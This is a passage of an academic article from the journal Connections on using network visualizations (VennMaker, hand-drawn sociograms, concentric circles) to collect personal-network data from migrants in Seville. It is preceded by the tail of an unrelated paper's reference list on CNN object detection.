Robert S, Luiz S O. Written dependent feature learning for offine signature verification using deep convolutional neutral networks [J]. Pattern Recognition, 2017(70): 163-176. [10] Abdelhamid O, Mohamed A R, Jiang H, et al. Convolutional neural networks for speech recognition[J]. IEEE/ACM Transactions on Audio, Speech, and Language Processing, 2014, 22(10): 1533-1545. [11] Redmon J, Divvala S, Girshick R, et al. You only look once: unified, real-time object detection[C]//Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, June 27-30, 2016, Seattle, WA, USA. New York: IEEE, 779-788. [12] Du Yuhong, Dong Chao-qun, etc. Application of improved Faster RCNN model in cotton fiber identification [J/OL]. Advances in laser and optoelectronics:1-14[2019-11-25]. [13] Xu shoukun, Wang yaru, Gu yuwan etc. Research on the detection of helmet wearing based on improved FasterRCNN [J/OL]. Computer application research: 1-6[2019-11-25]. [14] Song Shang-ling,Yang Yang etc. Pulmonary nodules detection algorithm based on Faster-RCNN [J/OL]. Chinese journal of biomedical engineering: 1-8[2019-11-25]. [15] Wang J, Chen K, Yang S, et al. Region Proposal by Guided Anchoring [J]. 2019. R ezatofighi H, Tsoi N, Gwak J Y, et al. Generalized Intersection over Union: A Metric and A Loss for Bounding Box Regression [J]. 2019. [16] Rezatofighi H, Tsoi N, Gwak J Y, etc. Generalized Intersection over Union: A Metric and A Loss for Bounding Box Regression[J]. 2019. [17] Zheng Lifei, Xiao lito, Li Xiaoqing. Forward modeling and application of geological radar advance prediction [J]. Communications science and technology, 2018(2):76-81. [18] Wu Zhengwen. Application of convolution neural network in image classification. Chengdu: University of Electronic Science and technology of China, 2015 [19] Lin Gang, Wang Bo etc. Multi-target detection and positioning of power line inspection image based on improved faster-RCNN [J]. Power automation equipment, 2019, 39(05):213-218. [20] Sainath TN, Kingsbury B, Saon G, et al. Deep convolutional neural networks for large-scale speech tasks [J]. Neural Networks, 2015, 64:39-48. work_dz4hp2vbnvhntnb4aujexwenge ---- 1© 2019 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/). Issue 1 | Vol. 39Article | DOI: 10.21307/connections-2019-003 What the eye does not see: visualizations strategies for the data collection of personal networks Isidro Maya-Jariego* and Romina Cachia Universidad de Sevilla, Seville, Spain. This paper was edited by Eric Quintane. *E-mail: isidromj@us.es Received for publication January 21, 2019. Abstract The graphic representation of relational data is one of the central el- ements of social network analysis. In this paper, the author describe the use of visualization in interview-based data collection procedures designed to obtain personal networks information, exploring four main contributions. First, the author shows a procedure by which the visualization is integrated with traditional name generators to facili- tate obtaining information and reducing the burden of the interview process. Second, the author describes the reactions and qualitative interpretation of the interviewees when they are presented with an analytical visualization of their personal network. The most frequent strategies consist in identifying the key individuals, dividing the per- sonal network in groups and classifying alters in concentric circles of relative importance. Next, the author explores how the visualiza- tion of groups in personal networks facilitates the enumeration of the communities in which individuals participate. This allows the author to reflect on the role of social circles in determining the structure of personal networks. Finally, the author compares the graphic rep- resentation obtained through spontaneous, hand-drawn sociograms with the analytical visualizations elicited through software tools. This allows the author to demonstrate that analytical procedures reveal aspects of the structure of personal networks that respondents are not aware of, as well as the advantages and disadvantages of using both modes of data collection. For this, the author presents findings from a study of highly skilled migrants living in Spain (n = 95) through which the author illustrates the challenges, in terms of data reliability, validity and burden on both the researcher and the participants. Keywords Visualization, Personal networks, Social support, Analytical proce- dures, Meaning. Network visualizations Graphic representation of relational data is one of the central elements of social network analysis (Freeman, 2004). Jacob Levy Moreno produced the first soci- ograms in the 1930s and over the years, they have evolved from ad hoc drawings to sophisticated visu- alizations, largely due to the new possibilities offered by computer and software development (Freeman, 2000; Moreno, 1934). Since their inception, visualiza- tions have been integrated in social network analysis in creative ways (Freeman, 2004; Hogan et al., 2007; Ryan and D’Angelo, 2018). However, the use of visual- izations to depict already collected data has predomi- nated. Such visualizations tend to be used to observe systematically the relations data and to detect emer- gent properties that may only be visible through the structure of the network. Visualizations are commonly CONNECTIONS 2 What the eye does not see: visualizations strategies for the data collection of personal network used to discover two kinds of patterns: social groups – a group of nodes highly linked to each other – and social positions – a group of nodes who are linked in the social system in similar ways (Freeman, 2000). Only recently has the application of visualization during data collection begun to be used (Carrasco et al., 2006; Hogan et al., 2007; Maya Jariego and Holgado, 2005; McCarty and Govindaramanujam, 2005; McCarty et al., 2007; Schiffer and Hauck, 2010). There are instances where a network vis- ualization is developed during the data collection with the help of the respondents who collaborate and work together through a collective effort. Thus, through the use of participatory tools to elaborate sociograms, participants make “implicit knowledge about networks of influences explicit” (Schiffer and Hauck, 2010, p. 242), apart from allowing the detec- tion of conflicting goals and areas with potential for cooperation. In this paper, we explore the contributions of visu- alizations when collecting personal network data, as well as its use to elicit the qualitative interpretation of individuals about their personal networks. According- ly, we show that the graphic representation of rela- tionships can be used in an innovative way to collect data from personal networks, both to obtain concrete information about relationships (i.e. ties and alters) and in the qualitative interpretation of interaction con- texts by the informants themselves. In the context of personal networks, most data is based on respondents reporting on the own relation of their ties (McCarty and Govindaramanujam, 2005). Visualizations are unique in providing an interactive tool for data collection, which may vary from a paper and pencil network visualization to more sophisticat- ed technological programs to gather this kind of data. Along the past two decades, a number of software packages with an incorporated visual interface were developed making the use of visualizations during data collection possible. The added value of visualization has been fre- quently sought in elements that go beyond the an- alytical representation of information. For example, it has been found that the hand drawings of the per- sonal network reveal the perception of the social world by individuals (McCarty et al., 2007); the tech- nique called “Net-Map,” based on a participatory strategy, is used in the construction of a community sociogram, following a group consensus-evaluation process (Maya-Jariego, 2016, Schiffer and Hauck, 2010); and EgoWeb has been used to maximize the differentiation of groups, which allows the identifica- tion of the social circles in which the individual partici- pates (McCarty and Govindaramanujam, 2005). Visualizations often provide a narrative to the net- work. The structure and composition of the network are very hard to read through a matrix, especially dur- ing data collection. In contrast, graphic representa- tions can be very efficient tools which enable both the researcher and the interviewee to see how the alters are connected visually, hence adding another layer of information during data collection, which would be ig- nored through a matrix. They may also be useful in depicting a wider variety of information that could be utilized to probe participants, bringing them into fur- ther discussion on their networks. For example, dis- cussing why certain nodes are isolated from the rest of the network. Nevertheless, using this mode of data collection poses various challenges to the research- ers, in terms of data reliability, validity and the added burden on both the researcher and the participants (Bastian et al., 2009). Generating personal networks through visualizations Personal networks may vary in size from as small as 10 to 100s or even 1000s of individuals (Killworth et al., 1990; McCarty et al., 2001; Pool and Kochen, 1978; Roberts et al., 2008). There is no clear bounda- ry delineating personal networks except the objective of the study in question (Fu, 2005), although limiting the number to a reliable subset of alters has been a major concern in personal network analysis. The se- lection is based on a trade-off between an efficient data collection process and achieving the most accu- rate representation of respondents’ personal network based on the objective of the study (Bidart and Char- bonneau, 2011). Over the years, distinct methods on how to elic- it personal networks and social support networks of people have been elaborated (Agneessens et al., 2002; Barrera, 1980; Bidart and Charbonneau, 2011; Fischer, 1982; Marin and Hampton, 2007; McCallister and Fischer, 1978), whereby the main tool used is a name generator. Comparatively, it has been less com- mon to use network visualizations to gather data on personal and social support networks (Hogan et al., 2007; Kahn and Antonucci, 1984), although it was proposed as an efficient strategy to give meaning to the contexts of interaction of the individuals (Maya Jariego and Holgado, 2005). Data on personal networks is typically collected in three stages: name generator, dyad relation between the alters (completing an adjacency matrix) and name interpreters. For each stage, different methods have been developed to elicit the data, varying from pa- per methods to computer-aided programs or a mix 3 CONNECTIONS of both. Network visualizations can be used in all of the three stages, whether to collect data or illustrate results (Tubaro et al., 2014). Generating names with the support of visualization techniques Researchers have used different visual aids and tech- niques to enable respondents enumerate their con- tacts. Free-hand spontaneous drawings have been used since the origin of personal networks visuali- zations. Free-hand drawings are easy to use, cheap, provide additional information that could be essential in the interpretation of the network through discus- sion and are less prone to technical failure (Cheong et al., 2013). They are also easy to modify during the interview using pencil (Hogan et al., 2007). At times, they have been used as an alternative technique to gather information, as in a study with immigrant chil- dren, where due to the diverse ethnic backgrounds, many of the respondents did not speak, read or write the language of the host country (den Besten, 2010). Researchers opting for this approach either leave the interviewees to draw their networks with hardly any instructions or have opted for giving some basic in- structions, so as to maintain some homogeneity be- tween the maps. A second version of this type of spontaneous rep- resentation may be acquired through the use of cards and other props to represent the actors and their power. Next, the relationships between actors are drawn. This process is usually carried out in a group, in a participatory manner, and is a way to show a shared vision about relationships in the community (Schiffer and Hauck, 2010). Despite the differences in format, it is also a creative and spontaneous descrip- tion, without restrictions, of the social network. Another common technique is concentric circles hierarchical mapping, whereby concentric circles of different sizes are used to provide a visual guide to interviewees in organizing their alters according to their closeness to ego, who tends to be placed at the center (Antonucci, 1986; Carrasco et al., 2006; Ho- gan et al., 2007). The number of concentric circles depends on the researcher. In previous research, we have observed the number varying from as little as 3 to up to 7 (Cheong et al., 2013; Hersberger, 2003). This approach is sometimes combined with other visual aids, such as dividing the concentric circles into 4 quadrants to gather other type of information (Ryan and D’Angelo, 2018); or the use of post-it notes which allows movability and reassessment of certain metrics on the same network (Hogan et al., 2007). An online version has also been tried by Tubaro et al. (2014), whereby respondents drew their sociogram on- line, an approach that according to the authors could be useful to study hidden or sensitive populations. The use of concentric circles is easy to prepare, appli- cable to a variety of respondents (Samuelsson et al., 1996) and depending on how you design it, may add network structural data (McCarty et al., 2007). None- theless, some respondents may find it challenging and confusing given it restricts them to a structure that they may not be comfortable when depicting their personal network (Ryan et al., 2014). Location maps have also been used as visual aides to understand movement of people. In a study using geo-referencing cell phone activity, maps were used to show population flows estimated every hour within an urban environment (Ratti et al., 2006). In an- other study, maps were used to illustrate where com- munity residents interacted in the city and the people they met in daily interactions (Pearce and Milne, 2010). Finally, another very simple way to generate names is to provide different boxes in which respondents can group alters according to different categories. Name boxed may be limited by a number, or provided as an open list; and the names obtained are some- times transferred to another type of visualization. The number of names mentioned may be influenced by the number of boxes listed in the questionnaire, with exposure to a larger amount of boxes leading to more alternatives (Vehovar et al., 2008). The characteristics and advantages of these four strategies for obtaining names and relationships are summarized in Table 1. Establishing relations between alters with the support of visualization techniques In order to gather data on the structure of the net- work, apart from the relation of each alter with ego, the researcher needs to gather data on the relation for each possible alter dyad. The adjacency matrix is the tool most commonly used for such purposes. This second stage of data collection is where the most benefits of using data visualizations are possi- bly noted. For example, with 30 alters interviewees have to go through 435 possible relations and hence, doing this in a document or a screen with rows and columns is much more burdensome. In fact, network researchers have recently experimented with some innovations in this area. Using visualizations, as alternative to the adja- cency matrix, respondents are engaged in a process where slowly they are unveiling their own network. The emergent visible network is a result, which tends to give immediate gratification to the respondents, especially if it is the first time they see their own net- 4 What the eye does not see: visualizations strategies for the data collection of personal network work visualization. It provides an interactive tool which beyond making relations visible, enables both the re- searcher and the participant to delve deeper when trying to understand and interpret the data (Moreno, 1953). Participants tend to attempt spontaneously to justify or interpret why their sociogram looks like it does, providing an additional layer of information dur- ing the interview. In the context of migration, it allows researchers to decipher the temporal and spatial dy- namics of patterns of change (Ryan and D’Angelo, 2018). On the downside, respondents may also feel exposed, and this could create some tension during the interview (Ryan et al., 2014). Obtaining name interpreters with visualization techniques Network visualization may also be used to gather data on name interpreters, which are aimed at pro- viding additional information on the alters listed. Most researchers gather data on the network composition, collecting socio-demographic information, as well as evaluative data. Again in this case, the use of visual- ization not only makes the data collection more in- teractive and hence, less burdensome, but also, if planned out adequately, it can effectively accelerate the recollection phase. In the context of mobility, re- searchers have shown particular interest in gathering evaluative data that could enable the interpretation of the network. For instance, regarding the alters of a mobile individual is relevant to know the place where they reside, the time they have spent in the location, the frequency of contact and the duration of the tie with ego, amongst other factors (Cachia and Maya Jariego, 2018; Domínguez and Maya-Jariego, 2008; Lubbers et al., 2007; Ryan and D’Angelo, 2018). Using visualization software to collect personal network data A variety of software packages has been developed to collect data on personal networks. On the one hand, programs designed as an extension of the pa- per name generator, through which a list of alters can be elicited from the interviewees (e.g. EgoNet); and, on the other hand, programs that collect data through a visual interface (such as EgoWeb, Vennmaker and OpenEddi). Programs with a visual interface provide an interactive tool, which gives a fun element to the data collection phase, as well as lowers respondent burden, typically associated with collection of per- sonal network data. However, they pose other issues that research- ers need to consider for collecting data efficiently. First, participants need to be technology conversant. Second, the researcher needs to play a more active Table 1. Four visualization displays to gathering data of personal networks. Display Description Advantages Free hand spontaneous drawing Respondents draw their network on a blank paper or a screen, with little instruction Sometimes, other aides, such as post-it notes, figures or colored markers are used Also applied in groups Easy to prepare and set up. Allows participants to be creative Prompts qualitative discourse Less prone to technical failure Useful when language may be a problem Concentric circles Several concentric circles differing in size are used to guide the respondent in placing alters in different circles, around ego Easy to set up and easy to use Good summary of complex relations Capture the psychological value of relationships Adds structural data Location maps Respondents use real maps to depict movement within a given location or to identify significant places within a location Maps are easy to use and respondents do not need much instruction on how to use them Particularly useful for studies on mobility, migration, community behavior settings, etc Name boxes Consists of providing specific name boxes for respondents to list their alters Enables respondents to list alters in a specific order Grouping names into group categories is natural and intuitive for respondents 5 CONNECTIONS role in the data gathering. Unmotivated respondents might leave out some of the ties between alters, given they are not asked to evaluate each alter pair tie as in a typical adjacency matrix (McCarty and Govindaramanujam, 2005). Third, the data acquired is limited to a given template of the program used, while in free-hand drawings respondents are free to draw additional information. Finally, interviewers need to consider whether to use a computer, laptop, tablet or mobile, as well as to take into account that in some areas, there is still limited access to internet connec- tion (Eddens et al., 2017). A visual interface facilitates the depiction of com- plex structures, making them easily comprehensi- ble, helping both the respondent and the interviewer (Gamper et al., 2012). Its structured layout provides an integrated view of relations that would be hard to per- ceive just through narratives (in qualitative analysis) or tables (in quantitative analysis) (Ryan and D’Angelo, 2018). In the same vein, it provides a perspective, es- pecially in the context of interpersonal research, which cannot be gained otherwise (McCarty et al., 2007). Moreover, visualizations are created in real-time, al- lowing participants to see their network, edit it and comment on it. Different coding techniques yield a vast amount of data summarized within one image, also enabling interviewees to identify errors in their network. Simply changing the shape of the nodes, for instance, using triangles for men and circles for women may allow respondents to detect information in their network, which they were not consciously aware about. Finally, as any digital tool it permits easy storage, modification, reusability (Gamper et al., 2012) and comparison with other networks. Comparison of drawings and computer-based visualizations Different studies have compared paper and computer- based visualizations. Christopher McCarty et al. (2007) found that computer-based network visual- izations rendered important details that were differ- ent from respondents’ perceptions of what they had originally drawn, for example, allowing respondents to compartmentalize alters of different ethnicities. In a similar comparison used to investigate which tech- nique was most useful in identifying cliques, groups and communities, freehand visualizations were found to be simplistic in comparison to computer-based maps, but the paper-based method allowed respond- ents to be more creative in differentiating between different relations present in their network (Cachia and Maya Jariego, 2010). Similarly, Hogan et al. (2007) found that the paper-based method was more visually compelling and allowed the respondents to see the network at once and to arrange the ties vis- ually easily using post-it notes. The most adequate method will depend on the objective of the study and the target population. For example, a highly skilled person is less likely to demonstrate reluctance to use an automated visual interface than someone who hardly knows how to use a computer, for whom the computer could already be creating a barrier that could negatively influence the interview. Sometimes, the profession of the respond- ents also plays an important role as found by Reyes (2016) in her study, whereby creative professionals showed a higher preference for free-hand drawing, as opposed to the use of an already pre-constructed design, such as concentric circles. Consequently, the generation of data through vis- ualizations remains an area of research where more studies are needed to better understand how differ- ent approaches to data visualizations could lead to less bias in the data collected. As we have shown along this introduction, there is no one single meth- od of generating empirical data through visualiza- tions that does not yield its challenges, in terms of reliability, ease of use and time allocated for the data collection. Network visualization is not a neutral tool, because like other instruments, it has its own bias and influence in how a personal network is visualized (Ryan et al., 2014). Moreover, the interviewer may also influence how a map is depicted (Samuelsson et al., 1996), given an interview is also a dialog between the interviewer and interviewee. A major advantage of the visualization method remains participant satisfaction and removing burden from the respondents that in it- self could lead to potential problems with validity and reliability, especially when networks are too big and respondents purposely obliterate data, due to tired- ness and boredom (Eddens and Fagan, 2018). This study In this paper, we explore four contributions related to the use of network visualization in the context of data collection, based on our study on a group of high- ly skilled migrants living in Spain (n = 95). First, we explore a procedure in which network visualizations are integrated with traditional name generators. Sec- ond, we examine the network visualization as a tool for qualitative interpretation for the participant dur- ing data collection. Third, we compare how sponta- neous, hand-drawn sociograms differ to analytical visualizations elicited through visualization software packages. Finally, we analyze different strategies on how respondents can use network visualizations to 6 What the eye does not see: visualizations strategies for the data collection of personal network identify communities in networks. For each section, we draw on our research to explore and discuss the methodological opportunities and challenges in using network visualizations during the data collection and their potential use in the future. Participants This research is based on data from 95 foreigners re- siding in Seville for a study that aimed at understand- ing how the type of mobility could influence the com- position and structure of personal networks (Cachia and Maya Jariego, 2018). Respondents belonged to four different foreign communities in Seville: Erasmus students (n = 33); partners of a research institute, as part of the Joint Research Centre of the European Commission (n = 25); Japanese flamenco artists (n = 19); and musicians from the royal symphonic or- chestra of Seville (n = 18). A high proportion of the respondents were female (70%) and the age of the respondents varied, with a majority belonging to the 21–41 age group (62%). The majority of respondents possessed post-graduate degrees (36%) or a degree (35%), for which we classified this population as high- ly skilled migrants, a population which has been less studied in the context of migration (Ryan et al., 2014). Interviews were conducted in English and lasted be- tween 50 and 75 minutes. Methods and procedure Data of this study was collected in two steps, using e-mail and face-to-face interviews. The first step of data collection consisted in a multiple name generator collected through a document sent by e-mail. In our study, participants were contacted prior to being sent the name generator and in most cases their names had been referred by friends through a snowball sam- pling. This helped in establishing a higher response rate. We ensured that participants were given clear instructions on how to complete the multiple name generator, with very precise instructions on how to fill the list of alters and an example to refer to should one get confused. The instructions were tested with five people of different nationalities for whom English was not the first language prior to starting the interviews and changes were made accordingly. Upon receipt of the name generator document, the researcher would set up the interview. On average, data collection from the two modes was separated by a week. In the second phase, participants were invited to attend an interview, during which three network visualizations were completed. First, participants produced a freehand drawing of their network. Second, using Vennmaker (Schönhuth et al., 2012), respondents represented the structure and com- position of their personal networks. Finally, using the same software, in a third visualization they were asked to elicit alters’ attributes. Vennmaker allows researchers to develop the personal networks with the respondents through visualization and to produce network data based on the visualization. It calculates basic network metrics and the network map can be exported as a matrix that could be imported in other programs, such as Ucinet or Visone. For this study, in the evaluation of the personal network, a fixed size of 30 alters was selected. This network size incorporates the major sources of social support according to previous research, which has shown that alters strongly connected with ego tend to be few varying between 2–30 (Wellman, 2007), with inner most layer of a network, known as sup- port clique averaging to five members and the next layer known as sympathy group oscillating between 12–15 members (Dunbar and Spoors, 1995; Milardo, 1992; Roberts et al., 2009). Second, this is a network large enough for structural network analysis, based on previous findings (McCarty, 2002; Maya-Jariego, 2018). On the other hand, this is a network size which is feasible in time during the data collection, given we wanted to administer 11 name interpreters for each 30 alters. Finally, the limit of 30 was stablished to pro- duce a legible representation, reducing the cognitive load and the concentration required to remember all the visual cues and instructions. Previous research has shown that when the number of alters is high, it becomes a challenge to visualize (Ryan et al., 2014). These decisions were based on reaching an equilib- rium between data collection efficiency through the gathering of data in the least time possible (Bidart and Charbonneau, 2011), and data reliability, both in terms of composition and structure (McCarty, 2002). The 30 names were elicited through a multiple name generator consisting of eight questions based on previous social support studies (Barrera, 1980; Burt, 1984; Fischer, 1982; Marin and Hampton, 2007; van der Poel, 1993; Wellman, 1979; Wellman and Wortley, 1990). The eight questions corresponded to emotional support, instrumental support, social companionship, co-presence and other types of sup- port. Given our interest in mobility, a specific name generator was added to identify which alters provoke travel from our respondents. The use of several name generators ensured that the research gathered data about a multidimensional definition of support, hence, obtaining a more accurate representation of the total social support network (Marin and Hampton, 2007; van der Poel, 1993). Single-name generator may be 7 CONNECTIONS much faster, but might result in forgetting individuals who are significant but not easily remembered (Bidart and Charbonneau, 2011). As demonstrated by Marin (2004), using different name generators may also be a way of avoiding association bias, whereby individuals only name persons who belong to the same group or belong to a similar activity. Using visualizations in empirical network data collection Integrating visualization with traditional name generators Graphical representation of relationships can be used effectively in the collection of empirical network data. In this section, we will examine two different ways in which it can be carried out. On the one hand, vis- ualization is a device that can be used to generate names and relationships, either by itself or in combi- nation with traditional name generators. On the other hand, once we have a finished network, the visuali- zation enables the informant to interpret the personal network and give meaning to the resulting structure. Generating names and relations through visualizations The traditional procedure to obtain a personal net- work usually consists of a name generator that pro- vides a list of names and the matrix of actors, com- pleted by the respondents. Alternatively, it has been comparatively much less frequent to use visualization to obtain information about personal networks. In this case, the nodes and relationships are represent- ed progressively, as the data is collected, which re- inforces the process of collecting information. There are some computer programs, such as VennMaker or Visone, that make it possible for researchers to start with a graphical input to develop a personal network, without the need to start from a previous data ad- jacency matrix. Accordingly, these programs may be incorporated directly in an interview, or in a survey, that is, in the process of data collecting. In general, the graphic interface is attractive to the informant and facilitates the respondents in remembering informa- tion. Moreover, it reduces fatigue and can be quite efficient. On the other hand, it is relatively more difficult to follow the same systematic and exhaustive collection of information that is typical of traditional name gen- erators, in which the relationship between each pair of actors is examined separately. Therefore, it is im- portant that the researcher is aware that some infor- mation may be lost, or that the usual analytical proto- col is not completed. In our study with four immigrant groups in Seville, respondents were provided with a variety of coding tools, given to them sequentially at different stages, so as to avoid confusion. The list of alters, which the respondents listed in the name generator was in- putted by the researcher in VennMaker and hence, during the interview, the respondents already had their list of alters displayed on the left-hand side of the program (see Figure 1, left). Ego was removed from the map, to avoid redundant information, given ego is connected to all alters. Respondents were instructed to move alters freely from the column on the left of the map space and to place alters wherever they liked on the map space. Once all alters were in the map space, a system- atic information collection procedure was followed, dyad after dyad, which was not considered finalized until questions about all the potential relations be- tween alters were asked. In our case, a relation was established if alters knew each other and would sa- lute each other in the absence of ego, as shown in Figure 1. Respondents were instructed to use a line between alters to indicate a relation between alters. During pretesting, we found that dividing the screen in four with a cross and suggesting respondents to start with relations of alters in the left bottom square and go clockwise, enabled participants not to get confused and forget any alter in the process. While this suggestion was voluntary, all the participants opt- ed to establish the relations using this order. Through this visualization, we obtained the adjacency matrix of our respondents, given the program we used provide the possibility to export the data of the visualization into an adjacency matrix. In our study, we have observed that when using a software package for data collection, the pres- ence of the researcher is a way of assuring that the data collected is complete, avoiding problems relat- ed to structure and composition due to incomplete networks as suggested by McCarty and Govindara- manujam (2005). During the data collection it is not uncommon for some participants to feel exposed sometimes even embarrassed or simply get tired, hence, it is important that the researcher steps in and helps with the network visualization. We have noticed that participants, especially those were less technolo- gy conversant, got tired quicker and were happy that the research could help with the visualization. During the network drawing on VennMaker, participants in- stinctively moved some alters around, in order, to be able to see the network better. VennMaker allows the 8 What the eye does not see: visualizations strategies for the data collection of personal network movement of alters, without altering the relations with alters. This was interesting because it demonstrated how participants looked for solutions and were not taken aback by seeing their visualization on a laptop opposed to findings in previous research (Hogan et al., 2007). Giving meaning to visualizations of personal networks When a graphic representation of the personal net- work is shown to the participant, a conversation about the properties of the visualization naturally aris- es. Spontaneously, participants are interested, some- times expressing surprise reactions to what they see. Generally, it is easy to elicit interpretations that try to explain the resulting graph. The interviewees provide a context to understand the overall structure, the ex- isting groupings or the position of some individuals (alters). Often, they resort to their biographical trajec- tory to give meaning to the composition or structural properties of the personal network. As shown in a previous study (Maya Jariego and Holgado, 2005), on average informants tend to di- vide their personal network into four groups which often correspond to the family, a group of friends, co-workers (or student friends) and a fourth context of alternative interaction, for instance, friends from a swimming club. They also tend to highlight around three key actors – who may be a partner, parents or a close friend – usually characterized by their significant connection to several of the groups identified in the personal network. When describing the visualization, attention is nor- mally focused on the central space and then moved to the periphery. The interpretation focuses on those individuals who seem to have a more prominent role in terms of centrality, or who connect several subsets in the network. In addition, respondents frequently re- sort to the identification of social groups, organizing their interpersonal space according to the usual inter- action contexts. We have summarized the qualitative description strategies of personal networks in Table 2. Visualizations provide the possibility to code the data in a way that is easy for both the participant and the researcher to understand the data. As can be observed in Figure 1 (right), which corresponds to an orchestra musician, a great deal of information can be depicted in one visualization. In this graph, we have used the color of the nodes to indicate the nationality of the nodes, the size of the nodes to indicate the duration of the tie and the map space to depict the location of alters mentioned. The graph suggests a respondent who is well settled in Seville, with a great proportion of important ties being Spanish, who also reside in Seville. The size of the nodes indicate that the respondent has possibly lived for a long time in Seville, given the respondent has known a high pro- portion of the local alters for more than 10 years. As typical in most immigrant networks, in the country Figure 1: Two visualizations presented to respondents. Left: basic network diagram before geographical classification of alters. This graphic was elaborated during the interview, in interaction with the interviewee. Right: personal network of a musician of the Royal Symphony Orchestra of Seville. Colors represent nationalities of alters: red, Spanish nationality; blue, same nationality as the respondent; green, other nationalities. Three areas distinguish the location of residence of alters: Seville (Spain), home country, other locations. The size of the node represents the duration of the tie, the bigger the node the longer the respondent knew alter. 9 CONNECTIONS of origin, alters are of the same nationality of the respondent. The nodes in the third location typically indicate previous movement of the ego, however, in this case, given alters are Spanish and of the same nationality of the ego, their position may suggest that it is alters who have moved to another location. The interview with the respondent was an opportunity to check that all this information was correct, as well as confirming the hypothesis that researchers derived from its interpretation. In our study, the first graphical representation of the network provided a good base for discussion. In general, respondents were pleasantly surprised to see their network and often, commented spontane- ously without any prompting on the structure of their network. Primarily, respondents often discussed the groupings of their network; as well as, identifying the groups and what type of relation they represented, as for instance, these are my friends from primary school, or these are family members who have moved to another country. Typically, respondents also dis- cussed alters who are central in their network in terms of connections, which instinctively were often de- picted in the center of the network space, as can be seen in Figure 1 (left). At the same time, most of the respondents would describe isolates in the network, such as Node 6 in Figure 1 (left). We sensed that typ- ically respondents wanted to give an explanation why these nodes were so isolated in their network. We also used a second map, which facilitated information on the geographical distribution of the respondents’ contacts. In this case, the relations covered a transnational space, between the coun- try of origin and the receiving country (and some- times even with a third geographical space, when the individual has previous itinerant trajectory). It is usual that the “there” and the “here” appear in the qualitative description of the graphic representation. This configuration introduces a greater fragmentation in personal networks (Maya-Jariego and Armitage, 2007), very evident for example in the case of Eras- mus students, with a short stay at destination. It also entails that the informants explain the changes that their personal network has experienced from a func- tional point of view. For example, it is typical that a group of strong ties are in the country of origin, while the rest (with whom now there are no opportunities for daily interaction) have passed into a latent state. On the other hand, the greater relative presence of weak ties in the new space of sociability (in this case, Seville) may depend on the length of stay and the type of mobility undertaken by the individual (Cachia and Maya Jariego, 2018). Previous mobility will also result into a more fragmented personal network, given al- ters may be more dispersed than if the respondents have only lived in one foreign location. Respondents with more dispersed networks, very frequent among the itinerant workers of the European Commission, were surprised that a good proportion of their social support network were living in other locations and immediately, tried to explain why their network was so fragmented. This visualization prompted discus- sion on how respondents receive social support from distance alters, whereby respondents discussed how they connected with these alters through media com- munications or periodic visits and how living in differ- ent location has led to a higher dispersion of alters. As we have already indicated, the visualization of the data following a core-periphery scheme is intuitive for the informants. The interpretation is usually guid- ed by the layout of subsets that corresponds to the most significant social contexts in which the individu- al participates. In addition, special attention is paid to alters that are more significant from a personal point Table 2. Qualitative description of personal networks. Strategies Description Implications Concentric circles Comments are organized in segments of relative importance, from the inside out Center-periphery logic Relative importance of individuals The role of alters with greater centrality and intermediation stands out Strong ties Brokers Groups Subsets of alternatively densely connected are identified Social circles Contexts of interaction Communities of belonging Isolates An explanation is often given to explain why certain nodes are isolated Accessibility to alternative social circles 10 What the eye does not see: visualizations strategies for the data collection of personal network of view, either because you have a more intense re- lationship with them, spend more time with them, or are providers of multiple types of social support. What is in a graph? Contributions of a systematic and analytical approach One conclusion that we can derive from the previous analysis is that the way the data are presented vis- ually is not inconsequential, since it can potentially affect the perception of the respondents or the type of comments and interpretations prompted from the graph. Next, we explore the value added by the an- alytical representation of networks when compared with other strategies individuals follow to spontane- ously describe their network. Finally, this will allow us to highlight the value of network analysis visualization in identifying underlying structures that are not natu- rally evident to individuals. Comparison of spontaneous hand-drawn visualizations with the analytical rep- resentation of the personal network To have an element of comparison, in our study we asked the participants to make a visual representation of their relationships. This request was left open, so as to allow spontaneous drawings and, thus, avoid- ing inducing a specific layout. For the same reason, the word “network” was intentionally omitted from the instructions. The result indicates to a certain extent how egos perceive their networks. The representations of the social relations of each individual obtained were highly varied. In Table 3, we summarize the eight most frequent drawings. Most respondents opted to represent their social relations through the use of groups with whom a frequent re- lationship is maintained. Specifically, the classification into social groupings appears in almost two-thirds of the analyzed drawings (n = 56, 62.9%). In some cas- es, the groups in which the individual participates are listed directly, while in others the subsets are drawn from the lists of names or nodes that have been pre- viously represented. The most frequent combinations are to identify groups from a list of names (n = 18, 20.2%) or from the Ego’s tree of relationships (n = 12, 13.5%), sometimes in the form of a star network. Al- though less common, there are some cases in which a graph with nodes and relationships is segmented into subgroups after its completion (n = 6, 6.7%). Two other common strategies were the elaboration of lists of names (n = 27, 30.3%) or the drawing of a star network around ego (n = 20, 22.5%). In both cases, the main strategy consists in reducing the interpersonal environment to the contacts available to the individual. However, the drawing of a relationship tree (or a star network) around the respondent usually entails, even if only partially, a close resemblance to the structure of relations around the respondent. For example, when drawing a star network around ego, some respond- ents place the most important relationships closer to ego, or point to indirect relationships that emerge from contacts in the first order zone of ego. Only a small number of respondents drew (partial- ly) graphs (n = 10, 11.2%), composed of a set of nodes and their relations to each other. Such graphs are usually incomplete, because even though relations are drawn between alters, they are not done exhaustively. Finally, concentric circles, as a way to organize the visualizations according to the relative importance of alters, hierarchical classification diagrams or group- ings depending on the geographical location of alters were also used. In Figure 2, we have selected six examples of graphic representations, to illustrate the combination of the strategies above. The classification into groups, either by the stacking of nodes (i.e. names) or by the use of social categories, is combined with all kinds of visualizations. The most common is to classify al- ters according to the type of relationship (for exam- ple, family, friends and neighbors), or depending on the interaction contexts (for example, “the group with whom I cycle”). We have observed that for the partic- ipants in our study, it is far much easier to represent their personal network in terms of social categories, as opposed to an analytical visualization of relation- ships. Also, the networks correspond to partial rep- resentations (such as a star network, node segments according to their relative importance or, at the sim- plest end, a list of names), rather than a complete graph, given the latter requires an exhaustive compi- lation of nodes and their relationships with each other. In this study, we found no evidence that the type of spontaneous visualization is related to the struc- tural properties of the personal network. However, in some cases we observed certain parallelism be- tween the respondent’s drawing on the blank page and the subsequent interactive representation with VennMaker. For example, an Erasmus student of Ger- man origin distributed his personal contacts between two differentiated socio-geographical spaces, rep- resenting the country of origin and the city of Seville (as we can see in Figure 3, left). This same scheme was repeated in the graph that was generated in VennMaker with the help of the interviewee (Figure 3, center). Possibly, the cognitive representation that an individual has of his personal network – although it 11 CONNECTIONS is a global perception, without attention to detail – , conditions the way in which information is stored and recovered from memory. Therefore, it can influence in 